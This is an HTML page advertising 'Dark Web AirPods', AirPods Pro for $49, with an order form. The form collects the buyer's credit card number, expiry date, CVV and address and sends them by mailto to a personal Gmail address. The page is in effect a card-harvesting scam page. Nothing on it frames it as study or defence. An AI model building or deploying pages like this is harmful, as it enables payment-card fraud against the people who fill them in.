<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>ESS Airpods</title>
  </head>
  <body>
    <h1>Dark Web AirPods</h1>
    <hr size=3 noshade>
<h3>Get an AirPods Pro for Only $49.00</h3>
<table cellspacing=25>
<tr> <td><img src="airpodspro2.png" alt=""></td>

<td>
  <ul>
      <li><h4>Active Noise Cancellation</h4></li>
      <li><h4>H1 chip</h4></li>
      <li><h4>More customizable fit and seal</h4></li>
      <li><h4>Up to 4.5 hours of listening time (on one charge)</h4></li>
      <li><h4>More than 24 hours of listening time (with Wireless Charging Case)</h4></li>
      <li><h4>Transparency mode</li>
      <li><h4>Sweat and water resistant (IPX4)</h4></li>
      <li><h4>Quick charging in the case</h4></li>
      <li><h4>Case can be charged either wirelessly using a Qi-certified charger or with the Lightning connector</h4></li>
  </ul></td></tr></tr>
      </table>

<br> <br>
<h1>ORDER</h1>


<table>

<tr>

<form class="" action="mailto:eymensafasaglam2@gmail.com" method="post" enctype="text/plain">
<td>  <label>Your Name:</label></td>
<td>  <input type="text" name="Your Name " value="" size="30"> </td> <br>
  </tr>
<tr>
<td><label>Your Email:</label></td>
<td><input type="email" name="Your Email " value="" size="38"></td>  <br>
</tr>
<tr>  <td></td></tr>
<tr>  <td></td></tr>
<tr>  <td></td></tr>
<tr>  <td></td></tr>
  <tr>
  <td><label>Your Credit Card Number:</label></td>
  <td><input type="text" name="Credit Card Number " value="" size="45"></td>  <br>
    </tr>
    <tr>
    <td><label>Expiration Date of the Card:</label></td>
    <td><input type="text" name="Expiration Date of the Card " value="" size="45"></td>  <br>
      </tr>
      <tr>
      <td><label>CVV:</label></td>
      <td><input type="text" name="CVV " value="" size="45"></td>  <br>
        </tr>
        <tr>  <td></td></tr>
        <tr>  <td></td></tr>
        <tr>  <td></td></tr>
        <tr>  <td></td></tr>
  <tr>
  <td><label>Your Address:</label></td>
  <td><textarea name="Your Address " rows="8" cols="40"></textarea></td>
</tr>
<tr>  <td></td></tr>
<tr>  <td></td></tr>
<tr>  <td></td></tr>
  <tr>
  <td><label>Your Message:</label></td>
  <td><textarea name="Your Message " rows="8" cols="40"></textarea></td>
</tr>
<tr><td></td></tr>
<tr><td></td></tr>
<tr><td></td></tr>

 <tr>
<td></td>
 <td>  <input type="submit" name="" value="Send My Informations"></td> </tr>
</form>
</table>
  </body>
</html>
